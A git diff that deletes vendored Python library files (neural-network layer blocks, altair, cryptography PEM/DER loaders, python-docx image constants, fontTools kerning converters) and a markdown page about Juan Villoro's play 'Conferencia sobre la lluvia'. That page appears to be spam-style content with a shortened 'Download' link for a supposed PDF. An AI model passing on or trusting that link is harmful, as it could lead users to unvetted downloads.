(rv + self.eps).rsqrt() - bias = b - rm * scale - return x * scale + bias - - def __repr__(self) -> str: - return f"{self.__class__.__name__}({self.weight.shape[0]}, eps={self.eps})" - - -class ConvNormActivation(torch.nn.Sequential): - def __init__( - self, - in_channels: int, - out_channels: int, - kernel_size: int = 3, - stride: int = 1, - padding: Optional[int] = None, - groups: int = 1, - norm_layer: Optional[Callable[..., torch.nn.Module]] = torch.nn.BatchNorm2d, - activation_layer: Optional[Callable[..., torch.nn.Module]] = torch.nn.ReLU, - dilation: int = 1, - inplace: Optional[bool] = True, - bias: Optional[bool] = None, - conv_layer: Callable[..., torch.nn.Module] = torch.nn.Conv2d, - ) -> None: - - if padding is None: - padding = (kernel_size - 1) // 2 * dilation - if bias is None: - bias = norm_layer is None - - layers = [ - conv_layer( - in_channels, - out_channels, - kernel_size, - stride, - padding, - dilation=dilation, - groups=groups, - bias=bias, - ) - ] - - if norm_layer is not None: - layers.append(norm_layer(out_channels)) - - if activation_layer is not None: - params = {} if inplace is None else {"inplace": inplace} - layers.append(activation_layer(**params)) - super().__init__(*layers) - # _log_api_usage_once(self) - self.out_channels = out_channels - - if self.__class__ == ConvNormActivation: - warnings.warn( - "Don't use ConvNormActivation directly, please use Conv2dNormActivation and Conv3dNormActivation instead." - ) - - -class Conv2dNormActivation(ConvNormActivation): - """ - Configurable block used for Convolution2d-Normalization-Activation blocks. - - Args: - in_channels (int): Number of channels in the input image - out_channels (int): Number of channels produced by the Convolution-Normalization-Activation block - kernel_size: (int, optional): Size of the convolving kernel. Default: 3 - stride (int, optional): Stride of the convolution. Default: 1 - padding (int, tuple or str, optional): Padding added to all four sides of the input. Default: None, in which case it will calculated as ``padding = (kernel_size - 1) // 2 * dilation`` - groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1 - norm_layer (Callable[..., torch.nn.Module], optional): Norm layer that will be stacked on top of the convolution layer. If ``None`` this layer wont be used. 
Default: ``torch.nn.BatchNorm2d`` - activation_layer (Callable[..., torch.nn.Module], optional): Activation function which will be stacked on top of the normalization layer (if not None), otherwise on top of the conv layer. If ``None`` this layer wont be used. Default: ``torch.nn.ReLU`` - dilation (int): Spacing between kernel elements. Default: 1 - inplace (bool): Parameter for the activation layer, which can optionally do the operation in-place. Default ``True`` - bias (bool, optional): Whether to use bias in the convolution layer. By default, biases are included if ``norm_layer is None``. - - """ - - def __init__( - self, - in_channels: int, - out_channels: int, - kernel_size: int = 3, - stride: int = 1, - padding: Optional[int] = None, - groups: int = 1, - norm_layer: Optional[Callable[..., torch.nn.Module]] = torch.nn.BatchNorm2d, - activation_layer: Optional[Callable[..., torch.nn.Module]] = torch.nn.ReLU, - dilation: int = 1, - inplace: Optional[bool] = True, - bias: Optional[bool] = None, - ) -> None: - - super().__init__( - in_channels, - out_channels, - kernel_size, - stride, - padding, - groups, - norm_layer, - activation_layer, - dilation, - inplace, - bias, - torch.nn.Conv2d, - ) - - -class Conv3dNormActivation(ConvNormActivation): - """ - Configurable block used for Convolution3d-Normalization-Activation blocks. - - Args: - in_channels (int): Number of channels in the input video. - out_channels (int): Number of channels produced by the Convolution-Normalization-Activation block - kernel_size: (int, optional): Size of the convolving kernel. Default: 3 - stride (int, optional): Stride of the convolution. Default: 1 - padding (int, tuple or str, optional): Padding added to all four sides of the input. Default: None, in which case it will calculated as ``padding = (kernel_size - 1) // 2 * dilation`` - groups (int, optional): Number of blocked connections from input channels to output channels. Default: 1 - norm_layer (Callable[..., torch.nn.Module], optional): Norm layer that will be stacked on top of the convolution layer. If ``None`` this layer wont be used. Default: ``torch.nn.BatchNorm3d`` - activation_layer (Callable[..., torch.nn.Module], optional): Activation function which will be stacked on top of the normalization layer (if not None), otherwise on top of the conv layer. If ``None`` this layer wont be used. Default: ``torch.nn.ReLU`` - dilation (int): Spacing between kernel elements. Default: 1 - inplace (bool): Parameter for the activation layer, which can optionally do the operation in-place. Default ``True`` - bias (bool, optional): Whether to use bias in the convolution layer. By default, biases are included if ``norm_layer is None``. - """ - - def __init__( - self, - in_channels: int, - out_channels: int, - kernel_size: int = 3, - stride: int = 1, - padding: Optional[int] = None, - groups: int = 1, - norm_layer: Optional[Callable[..., torch.nn.Module]] = torch.nn.BatchNorm3d, - activation_layer: Optional[Callable[..., torch.nn.Module]] = torch.nn.ReLU, - dilation: int = 1, - inplace: Optional[bool] = True, - bias: Optional[bool] = None, - ) -> None: - - super().__init__( - in_channels, - out_channels, - kernel_size, - stride, - padding, - groups, - norm_layer, - activation_layer, - dilation, - inplace, - bias, - torch.nn.Conv3d, - ) - - -class SqueezeExcitation(torch.nn.Module): - """ - This block implements the Squeeze-and-Excitation block from https://arxiv.org/abs/1709.01507 (see Fig. 1). 
- Parameters ``activation``, and ``scale_activation`` correspond to ``delta`` and ``sigma`` in eq. 3. - - Args: - input_channels (int): Number of channels in the input image - squeeze_channels (int): Number of squeeze channels - activation (Callable[..., torch.nn.Module], optional): ``delta`` activation. Default: ``torch.nn.ReLU`` - scale_activation (Callable[..., torch.nn.Module]): ``sigma`` activation. Default: ``torch.nn.Sigmoid`` - """ - - def __init__( - self, - input_channels: int, - squeeze_channels: int, - activation: Callable[..., torch.nn.Module] = torch.nn.ReLU, - scale_activation: Callable[..., torch.nn.Module] = torch.nn.Sigmoid, - ) -> None: - super().__init__() - # _log_api_usage_once(self) - self.avgpool = torch.nn.AdaptiveAvgPool2d(1) - self.fc1 = torch.nn.Conv2d(input_channels, squeeze_channels, 1) - self.fc2 = torch.nn.Conv2d(squeeze_channels, input_channels, 1) - self.activation = activation() - self.scale_activation = scale_activation() - - def _scale(self, input: Tensor) -> Tensor: - scale = self.avgpool(input) - scale = self.fc1(scale) - scale = self.activation(scale) - scale = self.fc2(scale) - return self.scale_activation(scale) - - def forward(self, input: Tensor) -> Tensor: - scale = self._scale(input) - return scale * input - - -class MLP(torch.nn.Sequential): - """This block implements the multi-layer perceptron (MLP) module. - - Args: - in_channels (int): Number of channels of the input - hidden_channels (List[int]): List of the hidden channel dimensions - norm_layer (Callable[..., torch.nn.Module], optional): Norm layer that will be stacked on top of the convolution layer. If ``None`` this layer wont be used. Default: ``None`` - activation_layer (Callable[..., torch.nn.Module], optional): Activation function which will be stacked on top of the normalization layer (if not None), otherwise on top of the conv layer. If ``None`` this layer wont be used. Default: ``torch.nn.ReLU`` - inplace (bool): Parameter for the activation layer, which can optionally do the operation in-place. Default ``True`` - bias (bool): Whether to use bias in the linear layer. Default ``True`` - dropout (float): The probability for the dropout layer. Default: 0.0 - """ - - def __init__( - self, - in_channels: int, - hidden_channels: List[int], - norm_layer: Optional[Callable[..., torch.nn.Module]] = None, - activation_layer: Optional[Callable[..., torch.nn.Module]] = torch.nn.ReLU, - inplace: Optional[bool] = True, - bias: bool = True, - dropout: float = 0.0, - ): - # The addition of `norm_layer` is inspired from the implementation of TorchMultimodal: - # https://github.com/facebookresearch/multimodal/blob/5dec8a/torchmultimodal/modules/layers/mlp.py - params = {} if inplace is None else {"inplace": inplace} - - layers = [] - in_dim = in_channels - for hidden_dim in hidden_channels[:-1]: - layers.append(torch.nn.Linear(in_dim, hidden_dim, bias=bias)) - if norm_layer is not None: - layers.append(norm_layer(hidden_dim)) - layers.append(activation_layer(**params)) - layers.append(torch.nn.Dropout(dropout, **params)) - in_dim = hidden_dim - - layers.append(torch.nn.Linear(in_dim, hidden_channels[-1], bias=bias)) - layers.append(torch.nn.Dropout(dropout, **params)) - - super().__init__(*layers) - # _log_api_usage_once(self) - - -class Permute(torch.nn.Module): - """This module returns a view of the tensor input with its dimensions permuted. 
- - Args: - dims (List[int]): The desired ordering of dimensions - """ - - def __init__(self, dims: List[int]): - super().__init__() - self.dims = dims - - def forward(self, x: Tensor) -> Tensor: - return torch.permute(x, self.dims) \ No newline at end of file diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/altair/vegalite/v5/data.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/altair/vegalite/v5/data.py deleted file mode 100644 index 703dffb3246a32f4734f0653dfcc1aaa0d1d23f9..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/altair/vegalite/v5/data.py +++ /dev/null @@ -1,43 +0,0 @@ -from ..data import ( - MaxRowsError, - curry, - default_data_transformer, - limit_rows, - pipe, - sample, - to_csv, - to_json, - to_values, - DataTransformerRegistry, -) - - -# ============================================================================== -# VegaLite 5 data transformers -# ============================================================================== - - -ENTRY_POINT_GROUP = "altair.vegalite.v5.data_transformer" # type: str - - -data_transformers = DataTransformerRegistry( - entry_point_group=ENTRY_POINT_GROUP -) # type: DataTransformerRegistry -data_transformers.register("default", default_data_transformer) -data_transformers.register("json", to_json) -data_transformers.register("csv", to_csv) -data_transformers.enable("default") - - -__all__ = ( - "MaxRowsError", - "curry", - "default_data_transformer", - "limit_rows", - "pipe", - "sample", - "to_csv", - "to_json", - "to_values", - "data_transformers", -) diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/cryptography/hazmat/primitives/serialization/base.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/cryptography/hazmat/primitives/serialization/base.py deleted file mode 100644 index 18a96ccfd5cd8a2fe04c6778bc9ed82f8b0e6e7e..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/cryptography/hazmat/primitives/serialization/base.py +++ /dev/null @@ -1,73 +0,0 @@ -# This file is dual licensed under the terms of the Apache License, Version -# 2.0, and the BSD License. See the LICENSE file in the root of this repository -# for complete details. 
- -from __future__ import annotations - -import typing - -from cryptography.hazmat.primitives.asymmetric import dh -from cryptography.hazmat.primitives.asymmetric.types import ( - PrivateKeyTypes, - PublicKeyTypes, -) - - -def load_pem_private_key( - data: bytes, - password: typing.Optional[bytes], - backend: typing.Any = None, - *, - unsafe_skip_rsa_key_validation: bool = False, -) -> PrivateKeyTypes: - from cryptography.hazmat.backends.openssl.backend import backend as ossl - - return ossl.load_pem_private_key( - data, password, unsafe_skip_rsa_key_validation - ) - - -def load_pem_public_key( - data: bytes, backend: typing.Any = None -) -> PublicKeyTypes: - from cryptography.hazmat.backends.openssl.backend import backend as ossl - - return ossl.load_pem_public_key(data) - - -def load_pem_parameters( - data: bytes, backend: typing.Any = None -) -> dh.DHParameters: - from cryptography.hazmat.backends.openssl.backend import backend as ossl - - return ossl.load_pem_parameters(data) - - -def load_der_private_key( - data: bytes, - password: typing.Optional[bytes], - backend: typing.Any = None, - *, - unsafe_skip_rsa_key_validation: bool = False, -) -> PrivateKeyTypes: - from cryptography.hazmat.backends.openssl.backend import backend as ossl - - return ossl.load_der_private_key( - data, password, unsafe_skip_rsa_key_validation - ) - - -def load_der_public_key( - data: bytes, backend: typing.Any = None -) -> PublicKeyTypes: - from cryptography.hazmat.backends.openssl.backend import backend as ossl - - return ossl.load_der_public_key(data) - - -def load_der_parameters( - data: bytes, backend: typing.Any = None -) -> dh.DHParameters: - from cryptography.hazmat.backends.openssl.backend import backend as ossl - - return ossl.load_der_parameters(data) diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/docx/image/constants.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/docx/image/constants.py deleted file mode 100644 index 90b469705e8aa42382295e1670ab16951232ae4f..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/docx/image/constants.py +++ /dev/null @@ -1,169 +0,0 @@ -# encoding: utf-8 - -""" -Constants specific the the image sub-package -""" - - -class JPEG_MARKER_CODE(object): - """ - JPEG marker codes - """ - TEM = b'\x01' - DHT = b'\xC4' - DAC = b'\xCC' - JPG = b'\xC8' - - SOF0 = b'\xC0' - SOF1 = b'\xC1' - SOF2 = b'\xC2' - SOF3 = b'\xC3' - SOF5 = b'\xC5' - SOF6 = b'\xC6' - SOF7 = b'\xC7' - SOF9 = b'\xC9' - SOFA = b'\xCA' - SOFB = b'\xCB' - SOFD = b'\xCD' - SOFE = b'\xCE' - SOFF = b'\xCF' - - RST0 = b'\xD0' - RST1 = b'\xD1' - RST2 = b'\xD2' - RST3 = b'\xD3' - RST4 = b'\xD4' - RST5 = b'\xD5' - RST6 = b'\xD6' - RST7 = b'\xD7' - - SOI = b'\xD8' - EOI = b'\xD9' - SOS = b'\xDA' - DQT = b'\xDB' # Define Quantization Table(s) - DNL = b'\xDC' - DRI = b'\xDD' - DHP = b'\xDE' - EXP = b'\xDF' - - APP0 = b'\xE0' - APP1 = b'\xE1' - APP2 = b'\xE2' - APP3 = b'\xE3' - APP4 = b'\xE4' - APP5 = b'\xE5' - APP6 = b'\xE6' - APP7 = b'\xE7' - APP8 = b'\xE8' - APP9 = b'\xE9' - APPA = b'\xEA' - APPB = b'\xEB' - APPC = b'\xEC' - APPD = b'\xED' - APPE = b'\xEE' - APPF = b'\xEF' - - STANDALONE_MARKERS = ( - TEM, SOI, EOI, RST0, RST1, RST2, RST3, RST4, RST5, RST6, RST7 - ) - - SOF_MARKER_CODES = ( - SOF0, SOF1, SOF2, SOF3, SOF5, SOF6, SOF7, SOF9, SOFA, SOFB, SOFD, - SOFE, SOFF - ) - - marker_names = { - b'\x00': 'UNKNOWN', - b'\xC0': 'SOF0', - b'\xC2': 'SOF2', - b'\xC4': 'DHT', - b'\xDA': 
'SOS', # start of scan - b'\xD8': 'SOI', # start of image - b'\xD9': 'EOI', # end of image - b'\xDB': 'DQT', - b'\xE0': 'APP0', - b'\xE1': 'APP1', - b'\xE2': 'APP2', - b'\xED': 'APP13', - b'\xEE': 'APP14', - } - - @classmethod - def is_standalone(cls, marker_code): - return marker_code in cls.STANDALONE_MARKERS - - -class MIME_TYPE(object): - """ - Image content types - """ - BMP = 'image/bmp' - GIF = 'image/gif' - JPEG = 'image/jpeg' - PNG = 'image/png' - TIFF = 'image/tiff' - - -class PNG_CHUNK_TYPE(object): - """ - PNG chunk type names - """ - IHDR = 'IHDR' - pHYs = 'pHYs' - IEND = 'IEND' - - -class TIFF_FLD_TYPE(object): - """ - Tag codes for TIFF Image File Directory (IFD) entries. - """ - BYTE = 1 - ASCII = 2 - SHORT = 3 - LONG = 4 - RATIONAL = 5 - - field_type_names = { - 1: 'BYTE', 2: 'ASCII char', 3: 'SHORT', 4: 'LONG', - 5: 'RATIONAL' - } - - -TIFF_FLD = TIFF_FLD_TYPE - - -class TIFF_TAG(object): - """ - Tag codes for TIFF Image File Directory (IFD) entries. - """ - IMAGE_WIDTH = 0x0100 - IMAGE_LENGTH = 0x0101 - X_RESOLUTION = 0x011A - Y_RESOLUTION = 0x011B - RESOLUTION_UNIT = 0x0128 - - tag_names = { - 0x00FE: 'NewSubfileType', - 0x0100: 'ImageWidth', - 0x0101: 'ImageLength', - 0x0102: 'BitsPerSample', - 0x0103: 'Compression', - 0x0106: 'PhotometricInterpretation', - 0x010E: 'ImageDescription', - 0x010F: 'Make', - 0x0110: 'Model', - 0x0111: 'StripOffsets', - 0x0112: 'Orientation', - 0x0115: 'SamplesPerPixel', - 0x0117: 'StripByteCounts', - 0x011A: 'XResolution', - 0x011B: 'YResolution', - 0x011C: 'PlanarConfiguration', - 0x0128: 'ResolutionUnit', - 0x0131: 'Software', - 0x0132: 'DateTime', - 0x0213: 'YCbCrPositioning', - 0x8769: 'ExifTag', - 0x8825: 'GPS IFD', - 0xC4A5: 'PrintImageMatching', - } diff --git a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/ufoLib/converters.py b/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/ufoLib/converters.py deleted file mode 100644 index daccf782727be132a16318fd7085e19def7e1139..0000000000000000000000000000000000000000 --- a/spaces/chuan-hd/law-assistant-chatbot/.venv/lib/python3.11/site-packages/fontTools/ufoLib/converters.py +++ /dev/null @@ -1,335 +0,0 @@ -""" -Conversion functions. -""" - - -# adapted from the UFO spec - - -def convertUFO1OrUFO2KerningToUFO3Kerning(kerning, groups, glyphSet=()): - # gather known kerning groups based on the prefixes - firstReferencedGroups, secondReferencedGroups = findKnownKerningGroups(groups) - # Make lists of groups referenced in kerning pairs. - for first, seconds in list(kerning.items()): - if first in groups and first not in glyphSet: - if not first.startswith("public.kern1."): - firstReferencedGroups.add(first) - for second in list(seconds.keys()): - if second in groups and second not in glyphSet: - if not second.startswith("public.kern2."): - secondReferencedGroups.add(second) - # Create new names for these groups. - firstRenamedGroups = {} - for first in firstReferencedGroups: - # Make a list of existing group names. - existingGroupNames = list(groups.keys()) + list(firstRenamedGroups.keys()) - # Remove the old prefix from the name - newName = first.replace("@MMK_L_", "") - # Add the new prefix to the name. - newName = "public.kern1." + newName - # Make a unique group name. - newName = makeUniqueGroupName(newName, existingGroupNames) - # Store for use later. - firstRenamedGroups[first] = newName - secondRenamedGroups = {} - for second in secondReferencedGroups: - # Make a list of existing group names. 
- existingGroupNames = list(groups.keys()) + list(secondRenamedGroups.keys()) - # Remove the old prefix from the name - newName = second.replace("@MMK_R_", "") - # Add the new prefix to the name. - newName = "public.kern2." + newName - # Make a unique group name. - newName = makeUniqueGroupName(newName, existingGroupNames) - # Store for use later. - secondRenamedGroups[second] = newName - # Populate the new group names into the kerning dictionary as needed. - newKerning = {} - for first, seconds in list(kerning.items()): - first = firstRenamedGroups.get(first, first) - newSeconds = {} - for second, value in list(seconds.items()): - second = secondRenamedGroups.get(second, second) - newSeconds[second] = value - newKerning[first] = newSeconds - # Make copies of the referenced groups and store them - # under the new names in the overall groups dictionary. - allRenamedGroups = list(firstRenamedGroups.items()) - allRenamedGroups += list(secondRenamedGroups.items()) - for oldName, newName in allRenamedGroups: - group = list(groups[oldName]) - groups[newName] = group - # Return the kerning and the groups. - return newKerning, groups, dict(side1=firstRenamedGroups, side2=secondRenamedGroups) - - -def findKnownKerningGroups(groups): - """ - This will find kerning groups with known prefixes. - In some cases not all kerning groups will be referenced - by the kerning pairs. The algorithm for locating groups - in convertUFO1OrUFO2KerningToUFO3Kerning will miss these - unreferenced groups. By scanning for known prefixes - this function will catch all of the prefixed groups. - - These are the prefixes and sides that are handled: - @MMK_L_ - side 1 - @MMK_R_ - side 2 - - >>> testGroups = { - ... "@MMK_L_1" : None, - ... "@MMK_L_2" : None, - ... "@MMK_L_3" : None, - ... "@MMK_R_1" : None, - ... "@MMK_R_2" : None, - ... "@MMK_R_3" : None, - ... "@MMK_l_1" : None, - ... "@MMK_r_1" : None, - ... "@MMK_X_1" : None, - ... "foo" : None, - ... } - >>> first, second = findKnownKerningGroups(testGroups) - >>> sorted(first) == ['@MMK_L_1', '@MMK_L_2', '@MMK_L_3'] - True - >>> sorted(second) == ['@MMK_R_1', '@MMK_R_2', '@MMK_R_3'] - True - """ - knownFirstGroupPrefixes = ["@MMK_L_"] - knownSecondGroupPrefixes = ["@MMK_R_"] - firstGroups = set() - secondGroups = set() - for groupName in list(groups.keys()): - for firstPrefix in knownFirstGroupPrefixes: - if groupName.startswith(firstPrefix): - firstGroups.add(groupName) - break - for secondPrefix in knownSecondGroupPrefixes: - if groupName.startswith(secondPrefix): - secondGroups.add(groupName) - break - return firstGroups, secondGroups - - -def makeUniqueGroupName(name, groupNames, counter=0): - # Add a number to the name if the counter is higher than zero. - newName = name - if counter > 0: - newName = "%s%d" % (newName, counter) - # If the new name is in the existing group names, recurse. - if newName in groupNames: - return makeUniqueGroupName(name, groupNames, counter + 1) - # Otherwise send back the new name. - return newName - - -def test(): - """ - No known prefixes. - - >>> testKerning = { - ... "A" : { - ... "A" : 1, - ... "B" : 2, - ... "CGroup" : 3, - ... "DGroup" : 4 - ... }, - ... "BGroup" : { - ... "A" : 5, - ... "B" : 6, - ... "CGroup" : 7, - ... "DGroup" : 8 - ... }, - ... "CGroup" : { - ... "A" : 9, - ... "B" : 10, - ... "CGroup" : 11, - ... "DGroup" : 12 - ... }, - ... } - >>> testGroups = { - ... "BGroup" : ["B"], - ... "CGroup" : ["C"], - ... "DGroup" : ["D"], - ... } - >>> kerning, groups, maps = convertUFO1OrUFO2KerningToUFO3Kerning( - ... 
testKerning, testGroups, []) - >>> expected = { - ... "A" : { - ... "A": 1, - ... "B": 2, - ... "public.kern2.CGroup": 3, - ... "public.kern2.DGroup": 4 - ... }, - ... "public.kern1.BGroup": { - ... "A": 5, - ... "B": 6, - ... "public.kern2.CGroup": 7, - ... "public.kern2.DGroup": 8 - ... }, - ... "public.kern1.CGroup": { - ... "A": 9, - ... "B": 10, - ... "public.kern2.CGroup": 11, - ... "public.kern2.DGroup": 12 - ... } - ... } - >>> kerning == expected - True - >>> expected = { - ... "BGroup": ["B"], - ... "CGroup": ["C"], - ... "DGroup": ["D"], - ... "public.kern1.BGroup": ["B"], - ... "public.kern1.CGroup": ["C"], - ... "public.kern2.CGroup": ["C"], - ... "public.kern2.DGroup": ["D"], - ... } - >>> groups == expected - True - - Known prefixes. - - >>> testKerning = { - ... "A" : { - ... "A" : 1, - ... "B" : 2, - ... "@MMK_R_CGroup" : 3, - ... "@MMK_R_DGroup" : 4 - ... }, - ... "@MMK_L_BGroup" : { - ... "A" : 5, - ... "B" : 6, - ... "@MMK_R_CGroup" : 7, - ... "@MMK_R_DGroup" : 8 - ... }, - ... "@MMK_L_CGroup" : { - ... "A" : 9, - ... "B" : 10, - ... "@MMK_R_CGroup" : 11, - ... "@MMK_R_DGroup" : 12 - ... }, - ... } - >>> testGroups = { - ... "@MMK_L_BGroup" : ["B"], - ... "@MMK_L_CGroup" : ["C"], - ... "@MMK_L_XGroup" : ["X"], - ... "@MMK_R_CGroup" : ["C"], - ... "@MMK_R_DGroup" : ["D"], - ... "@MMK_R_XGroup" : ["X"], - ... } - >>> kerning, groups, maps = convertUFO1OrUFO2KerningToUFO3Kerning( - ... testKerning, testGroups, []) - >>> expected = { - ... "A" : { - ... "A": 1, - ... "B": 2, - ... "public.kern2.CGroup": 3, - ... "public.kern2.DGroup": 4 - ... }, - ... "public.kern1.BGroup": { - ... "A": 5, - ... "B": 6, - ... "public.kern2.CGroup": 7, - ... "public.kern2.DGroup": 8 - ... }, - ... "public.kern1.CGroup": { - ... "A": 9, - ... "B": 10, - ... "public.kern2.CGroup": 11, - ... "public.kern2.DGroup": 12 - ... } - ... } - >>> kerning == expected - True - >>> expected = { - ... "@MMK_L_BGroup": ["B"], - ... "@MMK_L_CGroup": ["C"], - ... "@MMK_L_XGroup": ["X"], - ... "@MMK_R_CGroup": ["C"], - ... "@MMK_R_DGroup": ["D"], - ... "@MMK_R_XGroup": ["X"], - ... "public.kern1.BGroup": ["B"], - ... "public.kern1.CGroup": ["C"], - ... "public.kern1.XGroup": ["X"], - ... "public.kern2.CGroup": ["C"], - ... "public.kern2.DGroup": ["D"], - ... "public.kern2.XGroup": ["X"], - ... } - >>> groups == expected - True - - >>> from .validators import kerningValidator - >>> kerningValidator(kerning) - (True, None) - - Mixture of known prefixes and groups without prefixes. - - >>> testKerning = { - ... "A" : { - ... "A" : 1, - ... "B" : 2, - ... "@MMK_R_CGroup" : 3, - ... "DGroup" : 4 - ... }, - ... "BGroup" : { - ... "A" : 5, - ... "B" : 6, - ... "@MMK_R_CGroup" : 7, - ... "DGroup" : 8 - ... }, - ... "@MMK_L_CGroup" : { - ... "A" : 9, - ... "B" : 10, - ... "@MMK_R_CGroup" : 11, - ... "DGroup" : 12 - ... }, - ... } - >>> testGroups = { - ... "BGroup" : ["B"], - ... "@MMK_L_CGroup" : ["C"], - ... "@MMK_R_CGroup" : ["C"], - ... "DGroup" : ["D"], - ... } - >>> kerning, groups, maps = convertUFO1OrUFO2KerningToUFO3Kerning( - ... testKerning, testGroups, []) - >>> expected = { - ... "A" : { - ... "A": 1, - ... "B": 2, - ... "public.kern2.CGroup": 3, - ... "public.kern2.DGroup": 4 - ... }, - ... "public.kern1.BGroup": { - ... "A": 5, - ... "B": 6, - ... "public.kern2.CGroup": 7, - ... "public.kern2.DGroup": 8 - ... }, - ... "public.kern1.CGroup": { - ... "A": 9, - ... "B": 10, - ... "public.kern2.CGroup": 11, - ... "public.kern2.DGroup": 12 - ... } - ... 
} - >>> kerning == expected - True - >>> expected = { - ... "BGroup": ["B"], - ... "@MMK_L_CGroup": ["C"], - ... "@MMK_R_CGroup": ["C"], - ... "DGroup": ["D"], - ... "public.kern1.BGroup": ["B"], - ... "public.kern1.CGroup": ["C"], - ... "public.kern2.CGroup": ["C"], - ... "public.kern2.DGroup": ["D"], - ... } - >>> groups == expected - True - """ - - -if __name__ == "__main__": - import doctest - - doctest.testmod() diff --git a/spaces/cihyFjudo/fairness-paper-search/Conferencia Sobre La Lluvia Juan Villoro Pdf.md b/spaces/cihyFjudo/fairness-paper-search/Conferencia Sobre La Lluvia Juan Villoro Pdf.md deleted file mode 100644 index 4bc91b63b64e3dbd73e2c205f8b3458b70c8ecd6..0000000000000000000000000000000000000000 --- a/spaces/cihyFjudo/fairness-paper-search/Conferencia Sobre La Lluvia Juan Villoro Pdf.md +++ /dev/null @@ -1,17 +0,0 @@ - -

For the first time, the Centro Cultural PUCP (CCPUCP) presents a theatrical work in audiovisual format: Conferencia sobre la lluvia, a monologue by the Mexican writer Juan Villoro, starring Alberto Isola, a PUCP lecturer and distinguished Peruvian actor and director.

    -

    Conferencia Sobre La Lluvia Juan Villoro Pdf


Download: https://tinurli.com/2uwkwd



    -

On this occasion, we become the audience of an unusual academic lecture: a librarian, played by Isola, begins to speak about the relationship between literature and rain. Little by little, however, his talk turns into a downpour of confessions about love, loneliness, emotions, and other universal themes.

    -

What do you think of your play Conferencia sobre la lluvia being staged in a virtual format by the Centro Cultural PUCP?

    -

I am delighted that Conferencia sobre la lluvia is being presented in Peru with an actor of Alberto Isola's stature. I have been lucky enough to see the play staged in countries as diverse as Japan (where I had to follow it by the rhythm of the words, since I understood nothing), Italy, and Colombia (where the protagonist was a woman). The director, Marco Mühletaler, has understood the text perfectly for the Peruvian version, so I am very pleased. The play is about a librarian who, in trying to give a lecture, loses his way and talks about personal matters. The lecture turns into a confession. It has been staged not only in theaters but also at book fairs, libraries, and literature conferences (sometimes without warning that it is a theatrical performance rather than a serious lecture). I hope it has the same luck in Peru once the pandemic is over.

    -

    -

One-person shows lend themselves to an online staging. Moreover, the play deals with isolation. The protagonist is a librarian who lives immersed in books and struggles to relate to reality. He longs to give a lecture on the relationship between love poetry and rain, but he is not sure he can pull it off. The great question of any monologue is why someone speaks alone: what drives him to hold forth like that? This is explained at the end of Conferencia sobre la lluvia and, naturally, I am not going to reveal it. I will only say that it has to do with the remedies we find for loneliness and isolation, something that touches us very closely these days.

    -

Conferencia sobre la lluvia tackles a quintessentially theatrical situation: speaking in public. A lecturer misplaces his notes, and chance leads him to say unexpected things. The subject of the talk is the relationship between rain and love poetry. In the vertigo of improvisation, the protagonist speaks about himself without abandoning his original purpose: poets who have changed the weather with their verses come to his mind. Two forms of discourse blend in a fascinating way: the lecture and the confession. If a book depends on its reader, a lecture depends on its audience. A voice makes sense only if someone hears it. Mysteriously, it also defines whoever hears it. To listen is to be interpreted. "It is, in the end, a love story; a story of loneliness, in which the human being searches for himself within the poetic metaphors that inhabit books and that capture, with great efficacy, the elusiveness of human subjectivity." Juan Hernández

    -

The librarian's claim is moving; besides being simple and poetic, it is true: he says that it rains inside books. Conferencia sobre la lluvia is the world of shelves and pages imagined by the Mexican writer Juan Villoro, into which the actor and director Fabián Vena chose to immerse his sensibility. The experience has made him happy, and there will be two performances at Sala Arteón (Sarmiento 778): today at 9:30 p.m. and tomorrow at 8:30 p.m. (plus an acting masterclass today from 2 to 5 p.m.).

    -

-They were many, and they were enormous. The main one was sweeping away my prejudice against, and fear of, the one-person show, because in general they lack a strong convention that makes them solid or believable, with one person talking alone for an hour; but then I calmed down, thinking that whoever speaks for an hour is no crazier than whoever listens. On the other hand, I am obsessive about structure, and sometimes one-person shows do not travel that road, which is where their flaws appear. In that sense, I threw myself at the material once I realized, first, that the convention was superb, something the author himself describes in the book's prologue when he says there is nothing more theatrical than a lecture. The dramatic structure marks out a journey of units, of crescendos, where the character's emotional states clearly pace the course of the text, building from lesser to greater, as must happen in any play. Then comes the director's gaze; I like to stand there not only as a creative act of exploration with the actors, who are ultimately the ones who put the staging together, but also as a challenge in holding the audience's attention. When I direct, I place myself as a spectator, and I don't need to be sold anything. So I took great care that this juggler could hold the spectator's attention the whole time, so that it would not drift anywhere other than listening to and watching that character. I worked a great deal on this man's journey around that library and also with the music, because it immediately shifts the emotional state; and I added the contribution of audiovisual language, present from beginning to end through a screen on which a parallel path unfolds, one that can run alongside what is happening to the character.

    -

As for the plays, one of them, El filósofo declara, a comedy of neurosis between two philosophers, was staged at the Teatro Romea in Barcelona with Mario Gas in the leading role. My monologue Conferencia sobre la lluvia is about to premiere in Madrid, directed by Guillermo Heras. But I have not been an active participant in Spanish theater, so this book is a letter of introduction, and I am very glad that the publisher Punto de Vista is joining me in this adventure.

    -

I am going to read two brief excerpts from the monologue Conferencia sobre la lluvia. It is the story of a librarian who wants to give a lecture on the very fertile relationship between love poetry and rain, but he loses his notes, starts to improvise, and in doing so lets himself drift into personal confession. At the end of the monologue, and I will not reveal it here, we learn to whom this very peculiar address is directed. I will comment on two passages in which he refers to books and, to some extent, to love:

    -

This volume gathers six dramatic texts by Juan Villoro: El filósofo declara, Muerte parcial, Conferencia sobre la lluvia, La desobediencia de Marte, Cremación, and La guerra fría, accompanied by a prologue from the theater scholar and philosopher Víctor Molina and an interview with the author conducted by the historian and theater critic Zavel Castro.

    -

